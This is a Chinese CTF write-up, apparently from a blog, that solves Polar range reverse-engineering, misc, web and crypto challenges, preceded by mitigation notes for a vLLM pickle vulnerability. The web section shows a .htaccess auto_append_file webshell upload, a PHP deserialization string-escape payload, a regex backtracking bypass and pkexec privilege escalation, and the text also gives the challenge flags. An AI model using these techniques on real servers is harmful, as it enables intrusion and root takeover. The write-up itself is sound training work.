● 使用防火墙阻止来自不受信任源的连接（如仅允许 10.x 或 192.168.x IP）

● 切换到 V1 引擎，其不使用该模块

● 使用安全消息格式（如 JSON、protobuf），禁止pickle用于跨网络通信

参考文章

●github.com：https://github.com/vllm-project/vllm/security/advisories/GHSA-hjq4-87xh-g4fv

●github.com：https://github.com/vllm-project/vllm/pull/15988

●github.com：https://github.com/vllm-project/vllm/commit/0d6e187e88874c39cda7409cf673f9e6546893e7

●docs.vllm.ai：https://docs.vllm.ai/en/latest/deployment/security.html

题目来源polar靶场

简单题

RE

逆向愈发重要，我们通过题目快速建立逆向的基础

顺便熟悉一下各个方向的基础知识，因为后续要求的知识栈很宽广

第一题：shell

这个题目的话应该是base加密

额，是upx壳，呃呃呃

我们通过main进行溯源，成功找到main函数

​

这个题其实可以直接看出来，我们通过动调获取flag也是后知后觉

第二题：PE结构

这里我们还是直接尝试脱壳，结果发现不行

⚡Lenovo ❯❯ upx -d 'PE结构.exe'
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2025
UPX 5.0.0 Markus Oberhumer, Laszlo Molnar & John Reiser Feb 20th 2025

​

upx: PE结构.exe: NotPackedException: not packed by UPX

Unpacked 0 files.

我们拖入010editor

DOS头 和 NT头 就是 PE 文件中两个重要的文件头

一个 WORD 类型，值是一个常数 0x4D5A，用文本编辑器查看该值位‘MZ’，可执行文件必须都是'MZ'开头

这里是发现是DOS头被调改了

我们修改成4D然后点击保存运行即可

第三题：拼接

用记事本打开看看

然后我们改一下后缀打开看看

今年我们来看一下这个函数

依旧是动调直接出flag

第四题：加加减减

这个好像有个反调试，我们不能直接运行过去

我们分析逻辑，就是讲输入的每一个字符减一，然后再与一开始的字符串比较

我们一开始用下面这个方式写的

然后我们用下面这个方式去写

多上一步使用Unicode去转化，就是进入到单纯的数值层级与计算

第五题：康师傅

这个是比较的加密的，我们没法直接获取flag

我们需要异或一下输入

这个比我们平时做的简单多了

第六题：另辟蹊径

这个题是提供了GUI界面的一个题目

我们拖进去ida找字符串没找到flag

这个看其他的wp说是需要用到一改值的工具，我们不去弄了

第七题：use_jadx_open_it

apk文件，用jadx打开，进入MainActivity

然后我们直接看最后的结果比较就行

第八题:re2

这个也是很简单，直接给flag

第九题:layout

这个我们直接提交flag不行，然后想到题目名字是layout，我们直接去layout那里去看看

我们全局搜索flag即可

第十题:Why32

这个有点怪

下面这个是主函数

这个也是对输入加密，进行加密之间的比较

我们让输入的数值加上2即可，减去2，这里被惯性误导了

由于数据为32位，且只有数字和字母，猜测经过了md5加密，到在线网站解密

还原出来时md5，然后还需要进行md5解密

第十一题:?64

递归加1

这个看起来很像是base加密

我们这样打印发现明显不是，然后我们推测和上一题是一个类型的题目

MD5 - CyberChef

用这个网站在线解密即可

第十二题:Sign Up

我们用的是ida9.1，这个自动把字符串打印出来

这个题目设置了分割符，特意留下了两位

然后md5解密即可

中等题

re

第一题:JunkCode

上来先来一个花指令

这个我们来去除一下花指令

花指令大概是在这个位置

但00411AC4为花指令，后面的内容无法被正常识别和解析，导致反编译失败

具体的操作方法是：选中内存地址00411AC4，

按U键进行undefine

我们这样进行patch一下

按U键进行undefine

再选中00411AC5处按C键MakeCode

最后到函数头位置按P构建函数

然后我们成功还原，这里注意顺序不能错

先u，然后c，然后patch，然后再c，然后再p

这样之后花指令就还原出来了

这个我们没法动调，我们只能去还原一下这个逻辑了

第二题:RevMethod

我们通过字符串来追踪flag

全是flag我们看到

这个不是我们想要的

这个我们缺失了dll链接库，导致我们运行不了，然后我们缺失的好像也正好是那个部分

不是，我们这个题目的话提交最后flag就行了

第三题:逆一下子

这个题目一打开就是flag

然后我们跟进这个函数

这个需要Resource Hacker这个工具

这个我们没有工具，直接找答案

第四题：可以为师

这个题目直接给main函数就很舒服

这个迷宫题是我们第一次去做，想出一个迷宫pwn

如果它用的是 _getch()（常见于 Windows 控制台程序），那么 pwntools 无法交互，因为 _getch() 不走 stdin/stdout 管道。

所以我们pwntools的交互成功失败了

但在 Windows 上，完全自动化捕获 _getch() 程序的输出并响应非常困难。不过，我们可以采用一个 半自动但高效的爆破策略

● _getch() 不接受管道输入 → 无法用 subprocess 控制

● Windows 控制台程序的输出虽然可通过 subprocess 捕获（如果没重定向），但输入无法注入

●真正的“爆破”（尝试所有路径）会因路径长度指数爆炸而不可行（你的路径已是最短）

● 起点 (1,1)

● 终点 $ 在 (14,6)

●路径已通过 BFS 找到

这个交给ai给我写个就能出，原理的以后再去学习

sssssdddddwwaawwdddwddsssddwwddssdss

第六题：混淆Code？

奇偶分开处理

这个函数对于处理好的数值再次进行处理

这个函数是最后的检查，就是对后面的字节清零，然后和我们的输入比较，我们来逆推一下输入

首先我们先解决一下异或的问题，很长时间不写生疏了太多了

这里的话可以进行ida的动调，在动调中是可以看数值的，动调查看的话图片如下

然后我们计算好md5提交上即可

腾讯云这个社区也是挺不错的

国内外常用的MD5在线解密网站-腾讯云开发者社区-腾讯云

第七题：Java_tools

题目给出一个jar包，对输入的数值进行了下述的加密

一个是add

一个是re1

这里的xor没有调用，我们逐步分析一下

首先对于每一位+3

然后加上了一个交换的颠倒的算法

写python逆向的时候遇到一些问题

str 类型是不可变的，也就是说你不能通过索引直接修改字符串中的某个字符，比如 str[i] = 'x' 是不允许的。

第八题:PY_RE

解密比较，这里说明不能通过动调的方式直接出flag

判断代码如下

加密代码如下，一开始看成endata了，看错了

打印出来我们的dict，其实这里的逻辑的话也不能，主要是忘了Dict这个了

字典长度26

然后丢给ai分析，牵扯字符映射之类的，今天很累，先不去纠结了。

高等题

下面一开始刷错了，刷成all了

misc

第一题：broken_hash

题目给了我们两个附件，一个是png，一个是tip

我们用010打开png发现末位存在flag

binwalk分离之后得到提示7bf21a26cd6

爆破密码即可

第二题：deep

题目给了我们提示，这里是运行之后的数据的结果存放的地方

然后题目还给了我们一个源代码

这个是用c++写的，简单的分析一下逻辑，取数组内的数值，4个4个叠加，只打印出来原先索引位置是4的数值

还有注意的是这里ide单位的转化，所以说这里不是一个个输入的，而是一组组的输入的，我们将其转化成字符的形式应该会有flag

然后我们还原的时候用上按位与，chr和ord这个底层的数值转化即可

之后将获取到的flag提交即可

第三题：爱你

打开一看，是一个png图片，然后进入misc的领域

我们用Stegsolve.jar这个工具，红绿蓝0位通道可看到压缩文件格式开头的十六进制文本

然后我们用010editor可以弄到一个加密的压缩包，压缩包里有部分提示

我们解密一下

然后解压压缩包即可获得flag

flag{01e979f6dd21cd325e05fc1405e76bfd}

第四题：caigou

这个是个压缩包爆破的题目，密码爆破之后如下

zaqqaz

用随波逐流梭一下就行了

flag{ae7e960d8e7ce40e2157285680e2a5e4}

第五题：东北话是最好的语言

这个是给了一个look.txt文件

这里开始是逆向的题目

我们base64解码之后可以获得一个图片

然后我们用010editor打开后看到base64：xxxx

然后我们将结果转化成纯字符，最后套上md5即可

flag{4d5193eaeb2b18aa7e4357078b7550f3}

re

第一题：test

这个题目是安卓逆向，安卓逆向和java逆向还是有很大的不同的

这里是第一个活动，是一个密码，这个其实不用管

这里是第二个活动，将图片改成压缩包了

然后我们将解压后的打开会发现有个安装包，然后改成图片打开会有一个flag

第二题：高卢战记

这个题目给了一个没见过的obj后缀，这个的话拖进ida是仍然可以分析的，我们ida识别出来汇编

根据沪这里的特殊的字符，我们推断是有凯撒加密，因为里面出现了一组非常“刻意”的字符 —— :、<、以及 d e f g，这几类刚好都可以由 十六进制字符集（0-9a-f）整体 ASCII +3 得到。

写一个ord和chr组成的脚本就行

第三题：逢七则变

这个我都打不开，解析的正确，和那个proxy的题目是一个情况，我们怀疑是有了加壳

工具对应的链接如下

XVolkolak 0.22 静态脱壳神器汉化版 - 吾爱破解 - 52pojie.cn

脱壳之后的效果如下

第四题：android

apk文件，我们用jadx打开，然后分析主函数

我们看到这里的有一部分加密是调用了so，我们需要分析so库的judge函数

这里需要注意一点，DES加密部分 "64781852" 和密钥 "123!@#zaqXSWqwer" 与实际的验证流程完全无关，只是独立的日志记录代码的加密

我们打开so文件

从下面这个图我们可以确定judge函数是sub_7D0函数

加密的算法如下，这里aes加密

这个是用AES S-Box加密的算法，解密的脚本如下

第五题：动态库

这个题目考的是反调试的相关知识

这个是给了一个dll的动态链接库，其中有个函数名是GetFlag

我们写个idapython提取一下unk_100166BC这个地址，idapython如下

提取之后的结果如下

然后我们将这个结果打印一下即可获取到最后的flag

然后我们将这里的可打印的拼组起来就是flag的形式

flag{84649ac8ca256511a52fc9359fa367a1}

第七题：最短路

这段就是个“手动走图计权重”的题：Path[u][v] 里存了边权，你每次输入一对 (a, b) 就把这条边的权重加到 sum，直到你输入的 b == 15 为止（最后那条到 15 的边在循环外再加一次）。

Judge() 里要求 sum == 26 才算对，并提示 Shortest path。

把给定的边列一下（有向边）：

●1→2=2，1→3=3

●2→3=5，2→4=3，2→10=20

●3→5=6，3→8=5

●4→5=7

●5→8=1，5→9=4

●8→11=5，8→15=21

●9→12=5

●12→15=9

●11→15=13

●7→14=6，14→15=7（6→7=3）

这里的凑值我们直接交给ai分析

要凑到 26，最明显的一条（而且正好是最短路）是：

1 → 3 → 8 → 11 → 15
权重：3 + 5 + 5 + 13 = 26

所以你在程序里依次输入这几行就行：

1381115

第八题：Cre

这个题目对文件类型进行了魔改，导致我们的ida不能正常的的分析，我们需要给他改回去

之后就能看到主函数

我们还原出的dp如下

用 0-based 坐标 (行,列) 表示：

对应移动串（R=右，D=下）：
R D R R R D D D D D R R R D

这里最大的金币是75，然后我们md5加密之后即可获得flag

web

第一题：swp

我们用我们存在g盘的扫描一下网站的目录发现了一个index.php文件

我们访问.index.php.swp之后可以看到网站源码

这里需要参数又匹配/sys.*nb/is，又要求这个参数含有sys nb，还不能是数组

这里我们传递足够长的数据失效，我们使用PCRE回溯次数限制绕过

flag{4560b3bfea9683b050c730cd72b3a099}

第二题：简单rce

打开时候看到php源码

第三题：上传

这里我们不能直接上传php文件，我们需要先尝试上传.htaccess

这里我们上传还是不行，我们.htaccess和base64编码的木马，之后我们可以获取flag

也可以用其他的方法，传一个
php_value auto_append_file .htaccess
#

第四题：php是世界上最好的语言

题目直接给源码

题目提示flag在$flag这个变量中

两处变量覆盖，$POST的值要在第一处就覆盖好

最后传参的时候用504[SYS.COM

第五题：非常好绕的命令执行

也是直接给了php源码

if (!preg_match($blacklist,$evil) and !ctype_space($evil) and ctype_graph($evil)) 这一行是一个条件判断语句，检查拼接的恶意代码是否通过了黑名单检查，且不是纯空格字符，且是可打印的字符。

第六题：这又是一个上传

这个重复写了

第七题：网站被黑

有个base编码，解码后/n0_0ne_f1nd_m3/

之后我们获得php源码

第八题：ezjava

我们最后一个练手看看java

题目给了一个提示

我们用jadx打开一下附件分析

sqel注入

最后我们需要构造payload如下

然后我们编码一下

第九题：veryphp

题目直接给了我们源码

这个题目我们先获得提示看看，通过提示我们可以写个脚本

爆破出来之后是21475 ，然后我们可以成功过去flag的数值，至此成功获得flag

第十题：Unserialize_Escape

仍然是直接给了php代码

字符串逃逸

传上这个payload

username=Z3r4yxxxxxxxxxxxxxxxxxxxx";i:1;s:6:"123456";}

然后就有flag

第十一题：这又是一个上传

我们看页面源代码，发现是把检测程序的上传的安全机制写在前端js里面了

我们找到调试程序这里关闭js调试

关闭之后我们就能成功的上传了，然后我们链接上shell，发现有个这个

/opt/polkit-0.105/src/programs/.libs/pkexec这是一个允许授权用户以其他用户（通常是 root）身份执行命令的程序。系统

自带的 pkexec 通常在 /usr/bin/ 下。这里它出现在 /opt 下的源码编译目

录中，说明这是出题人特意为我们准备的利用点。

用上面这个和文件，然后编译之后运行就能完成提权。

crypto

我们还差最后30积分，我们用密码来凑

第一题：babyrsa

这个扔进去可以直接锁掉

第二题：easyrsa

ai直接就能出

第三题：classic

这个题目题目给的很少

只给了下面这个内容

FGAFDAXAGXDGDXAXAGDDAFDAAFFGFDAFGX

第四题：分段解密

crypto的内容如下

[[3202805436L, 509716930L], [3140667873L, 1667141091L], [3173275598L, 2248305098L], [709283154L, 3416762332L]]

加密脚本如下

然后写个解密脚本

换个位置就行了

翻转一下就能获得flag

flag{1UHSUW_IJNIL_1s_galf}

第五题：数学大师

给了一个很大的程序，点进去是不断闯关，需要过三关

丢给ai之后就能通过，最后flag如下

第六题：堂吉诃德走入猪圈

txt文件

得到答案用MD532位小写加密套上flag{}
压缩包密码为数字

堂吉诃德分别对应” 678 5 56 67 “，找笔画，找出来是5748

md加密之后提交即可

第七题：大主教的猪

给我的提示很有限

大主教开的猪圈里的所有猪都不见了，你能帮大主教找到他们在哪吗？
hint：得到的结果小写套上flag{}提交。

变种猪圈密码

对照得出结果即可获得flag

flag{they_are_on_the_truck}
至此，我们polar的杯子到手了